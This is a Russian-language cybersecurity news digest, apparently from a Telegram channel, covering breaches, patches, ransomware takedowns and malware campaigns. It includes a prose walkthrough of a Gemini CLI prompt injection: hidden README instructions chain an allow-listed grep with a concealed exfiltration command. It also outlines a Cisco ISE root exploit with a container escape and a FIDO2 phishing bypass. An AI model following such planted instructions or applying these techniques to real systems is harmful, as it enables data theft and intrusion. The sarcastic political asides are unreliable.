39806
Руки-ножницы российского инфосека. Для связи - mschniperson@mailfence.com
Один из крупнейших в мире операторов связи стал жертвой кибератаки.
Речь идет о французской Orange.
Компания предоставляет различные услуги в сфере связи для 294 млн. клиентов в Европе, Африке и на Ближнем Востоке, включая 256 млн. пользователей мобильной и 22 млн. пользователей фиксированной связи.
Компания насчитывает более 125 800 сотрудников по всему миру, выручка в 2024 году составила 40,3 миллиарда евро.
Скомпрометированная информационная система была обнаружена и изолирована от остальной сети подразделением ИБ Orange Cyberdefense 25 июля, что привело к сбоям в работе, которые должны быть устранены к 31 июля.
Согласно заявлению Orange Group, после обнаружения кибератаки компания уведомила соответствующие органы для проведения расследования, предварительные результаты которого указывают на отсутствие доказательств кражи каких-либо данных.
В Orange пока не связывает кибератаку с какой-либо конкретной хакерской группой или кластером угроз.
Однако исследователи находят сходство с аналогичными взломами AT&T, Verizon, Lumen, Charter Communications, Consolidated Communications, Windstream, Comcast, Digital Realty и Viasat которые переписывают китайской Salt Typhoon.
Но, скорее всего, опять белорусские киберпартизаны.
Apple выкатила исправления для десятков уязвимостей в своих операционных системах, в том числе для эксплуатируемой в реальных условиях ошибки.
Она отслеживается как CVE-2025-6558 и была раскрыта в середине июля, когда Google исправила ее в Chrome, выразив благодарность за ее обнаружения своей команде TAG и предупреждая о ее задействовании в качестве 0-day.
Ошибка связана с недостаточной проверкой ненадежных входных данных в графических компонентах Chrome ANGLE и GPU, которая может быть использована удаленно с помощью специально созданных HTML-страниц для выхода за пределы «песочницы» браузера.
Спустя неделю после того, как Google выпустила обновление Chrome 138, CISA добавила ошибку в свой каталог известных эксплуатируемых уязвимостей KEV. Правда, до сих пор не было ни одного отчета об атаках с использованием CVE-2025-6558.
В обновлениях для iOS и macOS Apple также представила исправления для CVE-2025-6558, которая влияет на WebKit и может привести к сбою Safari при посещении страницы с вредоносным контентом.
Но никаких свидетельств того, что эта уязвимость была использована в Safari пока нет.
В общей Apple выпустила исправления для 13 уязвимостей безопасности в WebKit, предупредив о возможности их задействования для XSS-атак, раскрытия конфиденциальной пользовательской информации, повреждения памяти, сбоя Safari или вызова состояния DoS.
Помимо WebKit другие компоненты платформы Apple также были улучшены, избавившись от значительного объема уязвимостей. В их числе: AppleMobileFileIntegrity, Model I/O и PackageKit.
Ещё одной заслуживающей внимания уязвимостью является CVE-2025-43223, которая затрагивает компонент CFNetwork в macOS и iOS, позволяя непривилегированным пользователям изменять ограниченные сетевые настройки.
CFNetwork Apple - это фреймворк, обеспечивающий сетевое взаимодействие, включая HTTP, HTTPS и другие протоколы. Поэтому любая уязвимость в фреймворке создаёт значительные риски безопасности.
В общем, Apple исправила 87 CVE в новом обновлении macOS Sequoia 15.6 и включила исправления для 29 уязвимостей в недавно выпущенные обновления iOS 18.6 и iPadOS 18.6.
В macOS Sonoma 14.7.7 исправлено 50 ошибок, в macOS Ventura 13.7.7 - 41 проблема, в iPadOS 17.7.9 - 19 ошибок, в watchOS 11.6 - 21 ошибка, а в tvOS 18.6 и visionOS 2.6 - по 24 ошибки.
Так что пользователям настоятельно рекомендуется как можно скорее обновить свои девайсы.
Уязвимость в Gemini CLI от Google позволяла злоумышленникам незаметно выполнять вредоносные команды и похищать данные с компьютеров разработчиков.
Ошибка была обнаружена Tracebit 27 июня, а исправления для нее стали доступны в версии 0.1.14, вышедшей 25 июля.
Gemini CLI, впервые выпущенный 25 июня 2025 года, представляет собой инструмент командной строки, разработанный Google, который позволяет разработчикам напрямую взаимодействовать с Gemini AI через терминал.
Инструмент способен выдавать рекомендации, писать код и даже выполнять команды локально, либо предварительно запрашивая разрешение у пользователя, а также используя механизм списка разрешенных действий.
Исследователи Tracebit сразу после его выпуска обнаружили, что Gemini CLI можно обманным путём заставить выполнить вредоносные команды.
В сочетании с уязвимостями пользовательского интерфейса эти команды могут привести к скрытым атакам на выполнение кода.
Эксплойт работает за счет использования процесса обработки Gemini CLI «контекстных файлов», в частности README.md и GEMINI.md, которые считываются в командной строке для анализа кодовой базы.
Исследователи Tracebit выяснили, что в этих файлах можно скрыть вредоносные инструкции для выполнения внедрения, в то время как плохой синтаксический анализ команд и обработка списков разрешений оставляют место для выполнения вредоносного кода.
Они продемонстрировали атаку, создав репозиторий, содержащий безобидный скрипт Python и зараженный файл README.md, а затем запустили его сканирование с помощью Gemini CLI.
Сначала Gemini получает указание запустить безобидную команду (grep ^Setup README.md), а затем запустить следующую за ней вредоносную команду извлечения данных, которая рассматривается как доверенное действие и не требует одобрения пользователя.
При этом вредоносная команда может быть любой (установка удаленной оболочки, удаление файлов и т.д.).
Более того, выходные данные Gemini можно визуально изменять с помощью пробелов, чтобы скрыть вредоносную команду от пользователя.
Безусловно, для атаки требуются некоторые серьезные предпосылки (например, предполагается, что у пользователя есть разрешенные определенные команды), но при определенных условиях во многих случаях злоумышленник может добиться желаемых результатов.
Пользователям Gemini CLI рекомендуется обновиться до google/gemini-cli">версии 0.1.14 последней), а также избегать запуска инструмента с неизвестными или ненадёжными кодовыми базами (либо делать это только в изолированных средах).
Tracebit протестировала метод атаки на других подобных инструментах, включая OpenAI Codex и Anthropic Claude, но как оказалось, безуспешно, в виду реализации более надежных механизмов разрешенного списка.
Активно эксплуатируемая в реальных атаках критическая RCE-уязвимость без аутентификации в Cisco Identity Services Engine (ISE) теперь обзавелась эксплойтом, которым публично поделился исследователь Бобби Гулд.
Она была впервые обнаружена 25 июня 2025 года и влияет на ISE и ISE-PIC 3.3 и 3.4, позволяя неаутентифицированным удаленным злоумышленникам загружать произвольные файлы в целевую систему и выполнять их с привилегиями root.
Проблема возникает из-за небезопасной десериализации и внедрения команд в методе enableStrongSwanTunnel().
Три недели спустя поставщик добавил в тот же бюллетень еще одну CVE-2025-20337, которая относится к той же проблеме, но теперь отслеживается в составе двух частей: CVE-2025-20281 (внедрение команды) и CVE-2025-20337 (десериализация).
Несмотря на то, что исправления уже были доступны ранее, Cisco настоятельно рекомендовала пользователям обновиться до версий 3.3 Patch 7 и 3.4 Patch 2 для устранения обеих уязвимостей.
22 июля 2025 года Cisco отметила CVE-2025-20281 и CVE-2025-20337 как активно используемые в атаках, призывая администраторов как можно скорее установить обновления.
В ближайшее время в полку атакующих явно прибавиться, ведь 25 июля Гулд выкатил технические подробности, демонстрируя запуск уязвимости внедрения команд в Cisco ISE с помощью сериализованной полезной нагрузки Java String[].
Исследователь добился выполнения произвольной команды от имени пользователя root внутри контейнера Docker, используя поведение Runtime.exec() Java и ${IFS} для обхода проблем токенизации аргументов.
Кроме того, он показал, как выйти из привилегированного контейнера Docker и получить права root на хост-системе, используя известную технику выхода из контейнера Linux на основе cgroups и release_agent.
Несмотря на то, что доводы Гулда не являются готовым скриптом эксплойта, который хакеры могут напрямую позаимствовать в свои цепочки атак, тем не менее отражают все технические подробности и структуру полезной нагрузки, которые будут весьма востребованными киберподпольем для воссоздания всего эксплойта.
Следует отметить, что обходных путей для этой уязвимости не существует, поэтому единственно рекомендуемым вариантом устранения CVE-2025-20281 являются лишь исправления, указанные в бюллетене Cisco.
Новой жертвой банды американских силовиков стала BlackSuit, которая за последние несколько лет расчехлила сети сотен организаций по всему миру.
Возглавивший операцию под кодовым названием Operation Checkmate Минюст США официально озвучил итоги в своем заявлении, подтверждая конфискацию доменов согласно полученному ордеру суда.
Теперь на публичных сайтах BlackSuit висят соответствующие баннеры.
В составе силовой банды отметились: Секретная служба США, Национальная полиция Нидерландов, Управление уголовной полиции Германии, Национальное агентство по борьбе с преступностью Великобритании, Генеральная прокуратура Франкфурта, Министерство юстиции, Украинская киберполиция и Европол.
Техническое сопровождение осуществляли представители подразделения по борьбе с киберпреступностью (известного как Draco Team) румынской Bitdefender.
BlackSuit начала свою деятельность в январе 2022 года под названием Quantum Ransomware и считается прямым преемником синдиката Conti.
Изначально они использовали шифровальщики других банд (ALPHV/BlackCat), но вскоре внедрили собственный - Zeon, и в сентябре 2022 года переименовались в Royal Ransomware.
В июне 2023 года после нападения на муниципальные органы Далласа, штат Техас, банда Royal сменила логотип на BlackSuit и перешла на новый шифровальщик.
Осенью того же года связь Royal и BlackSuit подтвердили в CISA и ФБР, приписав им 350 жертв и вменяя преступный доход до 275 млн. долл. (а общая запрашиваемая сумма выкупов - до полумиллиарда).
В общем пока правоохранители делили медали вдруг выяснилось то, о чем мы неоднократно уже говорили по поводу участившихся виртуальных операций западных спецслужб.
Исследователи Cisco Talos обнаружили артефакты, указывающие на то, что разработчики вируса-вымогателя BlackSuit, по всей видимости, орудуют уже под новый брендом Chaos Ransomware.
Talos с умеренной степенью уверенности полагает, что новая группа вымогателей Chaos либо является ребрендингом вируса-вымогателя BlackSuit (Royal), либо к управлению причастны некоторые из ее бывших членов.
Атрибуция основана на сходстве TTPs, включая команды шифрования, темы и структуру записок с требованием выкупа, а также использование инструментов LOLbins и RMM в своих атаках.
Более 200 000 сайтов WordPress продолжают работать с уязвимой версией плагина Post SMTP, которая позволяет получить контроль над учетной записью администратора.
Post SMTP - популярный плагин для обработки электронной почты в WordPress с более чем 400 000 активных установок, который позиционируется как более надёжная и многофункциональная реализация стандартной функции wp_mail().
23 мая сообщение об уязвимости было направлено в PatchStack. Уязвимости был присвоен CVE-2025-24000 и оценка CVSS 8,8.
Проблема затрагивает все версии Post SMTP до 3.2.0 и вызвана некорректным механизмом контроля доступа в конечных точках REST API плагина, который проверял только, вошел ли пользователь в систему, не проверяя при этом уровень его разрешений.
Так что пользователи с низкими привилегиями (такие как подписчики), могли получить доступ к журналам электронной почты со всем ее содержимым.
Подписчик мог инициировать сброс пароля для учетной записи администратора, перехватить соответствующее электронное письмо через журналы и получить контроль над учетной записью.
Разработчики плагина представили исправление для рассмотрения Patchstack 26 мая.
Проблему удалось решить включением дополнительных проверок привилегий в get_logs_permission перед предоставлением доступа к конфиденциальным вызовам API.
Исправление было включено в версию Post SMTP 3.3.0, опубликованную 11 июня.
Тем не менее, статистика загрузок на WordPress указывает на то, что лишь менее половины пользователей плагина (48,5%) обновились до версии 3.3.
При это более 200 000 сайтов остаются уязвимы к CVE-2025-24000, а половина из них и вовсе используют версии Post SMTP из ветки 2.x, уязвимые также для ряда иных проблем, формируя практически идеальные условия для атаки на цепочку мудаков реализации масштабной кампании.
Исследователи Seqrite Labs раскрыли кампанию кибершпионажа Operation CargoTalon, нацеленную на российские предприятия аэрокосмической и оборонной отраслей с использованием бэкдора EAGLET.
Вредоносная активность была атрибутирована к кластеру угроз, отслеживаемому как UNG0901 (Unknown Group 901).
Целями стали сотрудники Воронежского авиационного производственного объединения, одного из крупнейших предприятий по производству самолетов в России.
В атаках задействовались фишинговые письма с приманками на тему доставки грузов с ZIP-архивом, внутри которого находился LNK-файл, использующий PowerShell для отображения поддельного документа Microsoft Excel, а также внедряющий на хост файл DLL EAGLET.
EAGLET реализует сбор системной информации и устанавливает соединения с жестко запрограммированным удаленным сервером («185.225.17[.]104»), а после получения HTTP-ответа - выполняет на скомпрометированной машине Windows команды.
Имплант поддерживает доступ к оболочке и возможность загрузки/выгрузки файлов, но точный характер доставляемых полезных нагрузок следующего этапа неизвестен, учитывая, что сервер C2 к моменту исследования оставался в автономном режиме.
Исследователи Seqrite заявляют, что также обнаружили схожие кампании в отношении российского ВПК с использованием EAGLET, не говоря уже о совпадениях исходного кода и целей с Head Mare, о которых ранее сообщали исследователи Лаборатории Касперского.
В частности, отмечены функциональные параллели между EAGLET и PhantomDL - бэкдором на базе Go с оболочкой и возможностью загрузки/выгрузки файлов, а также сходство в алгоритме наименований, применяемой к вложениям в фишинговых сообщениях.
Индикаторы компрометации и технические подробности - в отчете индийской компании.
Печальные новости для участников хакерского форума Leak Zone.
IP-адреса авторизованных в системе пользователей в составе базы данных ElasticSearch оказались в открытом доступе без пароля и теперь попали в руки исследователей UpGuard, обнаруживших утечку.
Всего в ней в содержалось около 22 миллионов объектов, каждый из которых представлял собой запись веб-запроса с указанием домена, на который был отправлен запрос, IP-адрес пользователя и метаданные (местоположение и интернет-провайдер).
Помимо leakzone[.]net (95% всех записей) в базе фигурировал домен, упоминаемый в 2,7% записей - accountbot[.]io, сайт для продажи взломанных аккаунтов.
Начиная с 2020 года Leak Zone задействовался киберподпольем для реализации различных хакерских утилит, эксплойтов и слитых баз и учетных данных, а теперь и сам стал одной из таких утечек.
Sophos устранила пять уязвимостей в своем брандмауэре, которые позволяют удаленным злоумышленникам выполнять произвольный код.
Первая проблема отслеживается как CVE-2025-6704 (CVSS 9,8) и представляет собой критическую ошибку произвольной записи файлов в функции Secure PDF eXchange (SPX) устройства, которая позволяет удаленным неаутентифицированным злоумышленникам реализовать RCE.
Согласно рекомендациям Sophos, ошибка затрагивает лишь часть развертываний брандмауэров, поскольку может проявиться только в том случае, если включена определенная конфигурация SPX и брандмауэр работает в режиме высокой доступности (HA).
Вторая CVE-2025-7624 (CVSS 9,8) - это проблема SQL-инъекции в устаревшем прокси-сервере SMTP устройства.
Также приводя к RCE, уязвимость проявляется только если для электронной почты активна политика карантина, а SFOS была обновлена с версии старше 21.0 GA.
Таким образом, по данным Sophos, она затрагивает менее 1% устройств.
Компания также устранила серьезную ошибку внедрения команд в компоненте WebAdmin брандмауэра, которая позволяет удаленным неаутентифицированным злоумышленникам выполнять произвольный код на вспомогательных устройствах высокой доступности (HA).
Уязвимость, обозначенная как CVE-2025-7382 (CVSS 8,8), может быть активирована только в том случае, если включена аутентификация OTP для пользователя-администратора.
За последний месяц компания Sophos выпустила исправления для решения этих проблем в версиях брандмауэра 19.0 MR2 (19.0.2.472), 20.0 MR2 (20.0.2.378), 20.0 MR3 (20.0.3.427), 21.0 GA (21.0.0.169), 21.0 MR1 (21.0.1.237), 21.0 MR1-1 (21.0.1.272), 21.0 MR1-2 (21.0.1.277) и 21.5 GA (21.5.0.171).
Исправления также были включены в версию 21.0 MR2 устройства.
Последние две ошибки, описанные в бюллетене Sophos, CVE-2024-13974 и CVE-2024-13973, затрагивают компоненты Up2Date и WebAdmin устройства.
Для их эксплуатации злоумышленникам необходимо контролировать DNS-среду брандмауэра и войти в систему в качестве администратора соответственно.
Исправления этих дефектов впервые были включены в версию Sophos Firewall 21.0 MR1.
Компания заявляет, что пользователям более старых версий брандмауэра необходимо обновиться, чтобы получить все исправления.
Sophos отмечает, что не наблюдала случаев эксплуатации этих уязвимостей в реальных условиях.
Исследователи Akamai проанализировали последнюю версию банковского трояна для Windows - Coyote, и обнаружили задействование фреймворка Microsoft UI Automation (UIA) для получения данных со скомпрометированных устройств.
Фактически, по данным Akamai, Coyote - это первая вредоносная ПО, которая использует фреймворк UIA.
Coyote, впервые задокументированный Лабораторией Касперского в 2024 году, используется для атак на устройства Windows в Латинской Америке.
Он поддерживает кейлоггеры и фишинговые оверлеи для сбора данных, в частности, учётных данных для банковских и криптосервисов.
UIA является частью Microsoft .NET Framework и представляет собой легитимную функцию Microsoft, обеспечивающую программный доступ к элементам пользовательского интерфейса на рабочем столе.
Он позволяет вспомогательным технологическим продуктам предоставлять конечным пользователям информацию о пользовательском интерфейсе и управлять им с помощью средств, отличных от стандартного ввода.
В декабре 2024 года Akamai предупредила, что злоумышленники могут использовать UIA в вредоносных целях, заставляя пользователя запустить специально созданное приложение, использующее эту платформу.
Исследователи продемонстрировали возможности использования UIA для скрытого выполнения команд, перенаправления браузера и кражи конфиденциальных данных. Атаки работают на любой версии Windows и позволяют обходить защитные решения.
Недавно компания Akamai обнаружила, что ранее описанные риски теперь имеют вполне практическую реализацию: разработчики вредоносных ПО начали злоупотреблять UIA.
Причем Coyote, по-видимому, стал первым вредоносным ПО, операторы которого смогли сделать это в реальных условиях.
Несмотря на то, что UIA потенциально может использоваться для кражи конфиденциальных данных, разработчики Coyote полагаются на него для определения, какими финансовыми услугами пользуется жертва.
Вредоносная ПО сначала использует API Windows для получения заголовков открытых окон, проверяя их соответствие списку жёстко запрограммированных адресов веб-сайтов, связанных с банками и криптосервисами.
Если совпадений не обнаружено, вредоносная программа использует UIA для анализа дочерних элементов пользовательского интерфейса окна, что позволяет ей проверять вкладки и адресные строки браузера на соответствие зашитым в код адресам веб-сайтов.
Последняя версия вредоносного ПО таргетируется на 75 различных финансовых учреждений, в то время как ранее в январе этого года лаборатория Fortinet FortiGuard Labs фиксировала 73.
Как отмечаюи исследователи, без UIA разбор подэлементов другого приложения - достаточно нетривиальная задача.
Ведь чтобы эффективно читать содержимое подэлементов в другом приложении, разработчику необходимо очень хорошо понимать структуру конкретного целевого приложения.
Кроме того, Coyote может выполнять проверки независимо от того, находится ли вредоносная ПО в онлайн-режиме или в оффлайне, а это значительно увеличивает шансы успешно идентифицировать целевой банк или криптобиржу жертвы для того, что выкрасть учётные данные.
Финансовый сектор, промышленность и государственные учреждения остаются в числе главных целей киберпреступников в России.
Это подтверждается как общими наблюдениями, так и конкретными инцидентами, выявленными в ходе работы команды Kaspersky Managed Detection and Response (MDR).
Сервис MDR Лаборатории Касперского помогает компаниям своевременно детектировать и лочить атаки за счёт постоянного мониторинга, анализа телеметрии и выстроенных процессов реагирования.
Тем не менее, эффективность даже самого продвинутого сервиса зависит от полноты охвата инфраструктуры.
Недавний инцидент, связанный с таргетированной атакой на государственные IT-сервисы, в одной из африканских стран это наглядно подтверждает.
Злоумышленники использовали «вшитые» в код вредоносного ПО внутренние сервисы, IP-адреса и прокси-серверы, а одним из C2 стал захваченный сервер SharePoint внутри инфраструктуры заказчика.
Задействовался широкий арсенал инструментов, который включал не только самописное, но и общедоступное ПО (такое как Cobalt Strike).
Для сокрытия своих действий злоумышленники прямо во время атаки адаптировали применяемые техники, например переписывали исполняемые файлы и компилировали их как DLL для DLL sideloading.
Аналитики Kaspersky MDR зафиксировали активность модулей WmiExec и Atexec (набор инструментов Impacket) на хосте, который не был подключен к мониторингу.
После завершения работы модулей атакующие временно затаились, а затем стали проверять наличие защитных решений и использовать уязвимые участки инфраструктуры для дальнейшего распространения атаки.
При этом выявить следы использования Cobalt Strike и другие артефакты удалось лишь после подключения хоста к MDR.
В ходе всестороннего анализа инцидента активность была по итогу атрибутирована к китайской APT41, которая специализируется на кибершпионаже и нацелена на широкий спектр отраслей по меньшей мере в 42 странах. Причем до сих пор Африке APT была наименее активна.
Хотя представленный кейс завершился относительно благополучно, тем не менее он подчёркивает ключевое условие эффективности MDR: безопасность не может быть фрагментарной.
Отсутствие мониторинга хотя бы на одном сегменте инфраструктуры может превратить его в «слепое пятно» и точку входа для атаки. Полнота телеметрии напрямую влияет на своевременность и точность реагирования.
При этом сервис Kaspersky MDR базируется на многолетней экспертизе и глобальной базе знаний об угрозах (Threat Intelligence).
Ежегодно команда публикует подробные аналитические отчёты с актуальной информацией об угрозах и методах защиты.
Один из таких кейсов разобран в недавнем отчете по APT41 в Африке со всеми техническими деталями и IoCs.
По запросу французской прокуратуры на Украине был арестован один из администраторов действующего с 2013 года русскоязычного хакерского форума XSS.
Ресурс широко известен как один из крупнейших в киберподполье: на нем зарегистрировано более 50 000 пользователей.
Как заявляют французские власти, официальное расследование было начато 02 июля 2021 года отделом по борьбе с киберпреступностью прокуратуры Парижа при поддержке местного подразделения по борьбе с киберпреступностью полиции префектуры.
Основные усилия словаков были направлены на документирование киберпреступлений, прежде всего, связанных с ransomware, даже несмотря на то, что в мае 2021 года форум публично запретил все темы по вымогательству.
Согласно сообщениям полиции, основные успехи операции обусловлены тем, что правоохранителям удалось установить контроль за коммуникациями в Jabber.
Полицейским удалось взломать сервер «thesecure.biz» и отслеживать сообщения пользователей платформы.
Перехваченные сообщения позволил выявить многочисленные эпизоды киберпреступлений и атаки с использованием программ-вымогателей, которые принесли руководству платформы не менее 7 млн. долл. в качестве прибыли.
Дальнейший контроль технических каналов связи позволил установить личность предполагаемого администратора форума, оперативная разработка которого, начиная с сентября 2024 года, проводилась уже непосредственно на месте.
Подозреваемый был арестован вчера украинской полицией с участием французских офицеров и при содействии представителей Европола.
Учитывая, что на момент всех публикаций XSS продолжал оставаться в сети, участники форума могут не сомневаться, что среди его админов вполне могли появиться люди в погонах, причем задолго до выхода официальных сообщений.
По всей видимости, XSS может ожидать схема, которую провернули с BreachForum.
Но будем посмотреть.
Недавно исправленные критические RCE-уязвимости в Cisco Identity Services Engine (ISE), о которых мы сообщали, теперь активно используются в реальных атаках.
Соответствующий бюллетень команда Cisco PSIRT соответствующим образом обновила, но не представила каких-либо подробностей.
Ошибки максимальной степени серьезности были впервые раскрыты поставщиком 25 июня 2025 г. (CVE-2025-20281 и CVE-2025-20282) и 16 июля 2025 г. (CVE-2025-20337):
- CVE-2025-20281: RCE без аутентификации в Cisco Identity Services Engine (ISE) и ISE Passive Identity Connector (ISE-PIC). Злоумышленник может отправлять специально созданные API-запросы для выполнения произвольных команд с правами root в базовой ОС без аутентификации. Исправлена в ISE 3.3 (патч 7) и 3.4 (патч 2).
- CVE-2025-20282: связана с неаутентифицированной произвольной загрузкой и выполнением файлов в Cisco ISE и ISE-PIC версии 3.4. Отсутствие проверки файлов позволяет злоумышленникам загружать вредоносные файлы в привилегированные каталоги и выполнять их с правами root. Исправлена в ISE 3.4 (патч 2).
- CVE-2025-20337: RCE без аутентификации в Cisco ISE и ISE-PIC. Эксплуатация возможна через специально созданные запросы API из-за недостаточной проверки входных данных, что позволяет получить root-доступ без учётных данных. Исправлена в ISE 3.3 (патч 7) и 3.4 (патч 2).
Все три уязвимости имеют максимальную степень серьезности (CVSS: 10,0) и могут эксплуатироваться удаленно без необходимости аутентификации.
Cisco выпустила два отдельных патча для трёх уязвимостей в виду разницы во времени их обнаружения.
Для одновременного устранения всех уязвимостей администраторам рекомендуется: пользователям ISE 3.3 - обновиться до патча 7, а для 3.4 - до патча 2.
Пользователям ISE 3.2 или более ранних версий не нужно предпринимать никаких действий. Обходные пути для уязвимостей отсутствуют.
В связи с активным использованием уязвимостей крайне важно как можно скорее перейти на исправленную версию ПО для устранения возникающих рисков.
Исследователи Expel обнаружили фишинговую кампанию PoisonSeed, которая обходит защиту ключей безопасности FIDO2, используя функцию входа между устройствами в WebAuthn, обманом заставляя пользователей одобрять запросы на аутентификацию входа с фейковых корпоративных порталов.
Злоумышленники PoisonSeed реализуют масштабные фишинговые атаки в рамках кампаний, связанных с финансовым мошенничеством.
Предыдущие рассылки были нацелены на активы в криптокошелках пользователей.
В наблюдаемой фишинговой кампании PoisonSeed не использовали какую-либо уязвимость системы безопасности FIDO2, а вместо этого злоупотребляли легальной функцией аутентификации между устройствами, которая понижает процесс аутентификации ключей FIDO.
Кросс-девайсная аутентификация в WebAuthn позволяет пользователям входить в систему на одном устройстве, используя ключ безопасности или приложение аутентификации на другом.
Вместо физического подключения, например, подключения ключа безопасности, запрос на аутентификацию передаётся между устройствами по Bluetooth или посредством сканирования QR-кода.
Атака начинается с перенаправления пользователей на фишинговый сайт, который выдает себя за корпоративные порталы входа, например, Okta или Microsoft 365.
Когда пользователь вводит свои учетные данные на портале, реализуется AiTM для скрытого входа с предоставленными учетными данными на реальном портале в режиме онлайн.
Пользователь, подвергшийся атаке, обычно использует свои ключи безопасности FIDO2 для проверки запросов MFa.
Однако фишинговый бэкенд вместо этого указывает легитимному порталу входа использовать кросс-девайсную аутентификацию.
Это заставляет легитимный портал генерировать QR-код, который передается обратно на фишинговую страницу и отображается пользователю.
Когда пользователь сканирует этот QR-код с помощью своего смартфона или приложения аутентификации, он одобряет попытку входа в систему, инициированную злоумышленником.
Этот метод эффективно обходит защиту ключей безопасности FIDO2, позволяя злоумышленникам инициировать процесс входа в систему, основанный на аутентификации между устройствами вместо физического ключа FIDO2 пользователя.
Кроме того, Expel также зафиксировала отдельный инцидент, когда злоумышленник зарегистрировал собственный ключ FIDO после компрометации учётной записи, предположительно, с помощью фишинга, и сброса пароля.
Эта атака наглядно демонстрирует, как злоумышленники находят способы обойти аутентификацию, устойчивую к фишингу, обманным путем заставляя пользователей проходить процедуры входа в систему, минуя необходимость физического взаимодействия с ключом безопасности.
Исследователи полагают, что новый метод можно легко перепрофилировать для любого типа целей, которые ранее считались неуязвимыми для фишинга из-за активных ключей FIDO.
Специалисты Лаборатории цифровой криминалистики и исследования вредоносного кода F6 выпустили собственную утилиту для дешифровки файлов жертв, пострадавших в ходе атак Phobos ransomware.
Причем отметим, что упомянутые вчера японские правоохранители, как нам подсказали, выкатили код с ошибками. А рабочий инструмент от F6 можно скачать на GitHub.
Исследователи Avast выпустили общедоступный дешифратор для вируса-вымогателя FunkSec.
С момента появления в декабре 2024 года FunkSec атаковала 113 жертв, чьи данные украденные данные размещались на DLS банды до тех, пор пока в марте сайт не был закрыт.
FunkSec изначально занималась лишь кражей данных и последующим вымогательством, но затем добавила и шифрование.
Причем, как полагают в Avast, для написания этого вируса-вымогателя задействовался ИИ.
Файлы, зашифрованные с помощью вируса-вымогателя FunkSec, имеют расширение «.funksec». Кроме того, в каждую папку помещается файл с требованием выкупа под названием «README-{random}.md».
Программа-вымогатель написана на языке Rust. Для криптографических операций она использует библиотеку orion-rs версии 0.17.7.
Файлы шифруются с помощью Chacha20 с использованием Poly1305 MAC.
Инструкция по запуску дешифратора - в очтете.
Исследователи Binarly предупредили об уязвимостях в устройствах Lenovo, которые позволяют повышать привилегии, выполнять код и обходить защиту, а также внедрять импланты в целевые системы.
В общей сложности было найдено шесть уязвимостей в BIOS Insyde моноблоков Lenovo IdeaCentre и Yoga, в частности в режиме управления системой SMM - режиме работы, предназначенном для низкоуровневого управления системой.
Поскольку SMM загружается до ОС и сохраняется после переустановки, это делает его идеальной целью для атак, нацеленных на обход безопасной загрузки и внедрения скрытого вредоносного ПО.
Уязвимостям присвоены идентификаторы CVE от CVE‑2025‑4421 до CVE‑2025‑4426. Четыре из них имеют высокий уровень серьезности, остальные - средний.
Уязвимости с высоким CVSS связаны с повреждением памяти, которое может привести к EoP и RCE в SMM.
Уязвимости среднего уровня серьёзности могут привести к раскрытию информации и обходу механизмов безопасности.
Злоумышленники, имеющие привилегированный доступ к целевому устройству Lenovo, могут воспользоваться уязвимостями для обхода средств защиты флэш-памяти SPI и SecureBoot, нарушения изоляции гипервизора и внедрения имплантов, которые сохранят работоспособность даже после переустановки.
Исследователи Binarly уведомили Lenovo об ошибках еще в апреле, поставщик подтвердил их наличие только в июне, выпустив к настоящему времени исправления только для продуктов IdeaCenter, обновления для Yoga - еще в работе.
И Lenovo, и Binarly также представили рекомендации по безопасности с описанием выявленных уязвимостей (1 и 2 соответственно).
Французская Naval Group приступила к расследованию киберинцидента, о котором узнала с просторов киберподполья.
Речь идет о крупной утечке данных в объеме 1 ТБ, который были украдены из сети компании.
Naval Group (ранее DCNS) специализируется разработке систем морской обороны и строительстве боевых кораблях. Контрольный пакет акций компании принадлежит французскому правительству, а остальная часть - оборонному гиганту Thales Group.
На обслуживании Naval Group состоят военно-морские суда, включая фрегаты, эсминцы, атомные подводные лодки и авианосцы, а также состоящие на вооружении флота боевые системы и военные технологии.
Naval Group является ведущим поставщиком ВМС Франции, а также экспортирует продукцию в Австралию, Бразилию, Индию и Египет.
Представители самой компании уже назвали потенциальную утечку «попыткой дестабилизации» и «репутационной атакой», попутно приступив к расследованию с привлечением сторонних специалистов и CERT Военно-морской группы.
Несмотря на заявленные хакерами доводы, в Naval Group утверждают, что пока не видят признаков взлома своих ИТ-систем, а также какого-либо влияния на текущую деятельность.
Так или иначе 23 июля некто, известный под псевдонимом Neferpitou, опубликовал большой массив данных объёмом 13 ГБ, предположительно украденных у Naval Group.
В числе них, по всей видимости, оказались сведения в отношении засекреченной CMS военных судов, техническая документация, данные моделирования и служебная переписка.
Злоумышленник предоставил Naval Group 72 часа для решения вопроса об оплате выкупа, но вскоре вывалил на DarkForums весь массив украденных данных в размере 1 ТБ.
Как полагают некоторые эксперты, представленные материалы могли быть украдены в результате инцидента 2022 года, когда на Thales была совершена атака с использованием программы-вымогателя LockBit 3.0.
Но будем посмотреть.
Нас просят более конкретно высказаться по поводу инцидента с Аэрофлотом.
А говорить нам нечего, потому что мы все давным-давно сказали. Когда-то у нас на уровне государства существовала такая системная (ну ок, ок - полусистемная) дисциплина как "информационная безопасность", сейчас - нет. Потому что система, реализация которой приносит прямо здесь и сейчас расходы для коммерции, отданная на откуп этой же самой коммерции, не работает. Всерьез расчитывать на "ответственный бизнес" в текущих реалиях может только совсем незамутненный человек.
Картина может поменяться. Например, если отвечающий за ИБ заместитель гендиректора Аэрофлота внезапно присядет лет на 7 по ч.5 ст. 274.1 УК РФ.
Это будет пиздец, это будет мрак, кошмар, Адъ и Израиль для всех сотрудников отрасли информационной безопасности, но по-другому ничего не вырастет.
Остается, конечно, вариант когда Евгений Валентинович совершит во имя Б-га Инфосека торжественное аутодафе, на котором сожжет 1024 зараженных малварью жестких диска и разобьет ритуальной кувалдой древний мейнфрейм с первым экземпляром первого в мире вируса, а потом вознесется в инфосечьи небеса и вернется с армией киберсекангелов, ведомой реинкарнацией Кевина Митника, готовых карать и воздавать.
Но маловероятно.
А пока смертельно увлекательный атракцион "весь инфосек за 120" продолжается.
Предпринята очередная (100500-ая) попытка разыграть карту BreachForums.
Сообщается, что в сети появился еще один BreachForums, на этот раз под управлением некоего Bossman.
Вся структура и контент остались без изменений, как и аккаунты участников, а также модераторов из числа представителей спецслужб.
Доброго понедельника, наши дорогие друзья!
Мы все утро изучаем словарь метафор и идиоматических выражений, чтобы литературным русским языком описать то, что, согласно Приказу ФСБ России № 547, описывать нельзя.
Нашли две формы - пословицы да поговорки и поэтическую.
Во-первых, не так страшен черт как его малювати.
А во-вторых, нефиг было сиси мять - CISO сразу надо брать!
Исследователи BI.ZONE Threat Intelligence выявили новую кампанию Core Werewolf, в ходе которой атакующие впервые использовали документы Microsoft OneNote для маскировки ВПО.
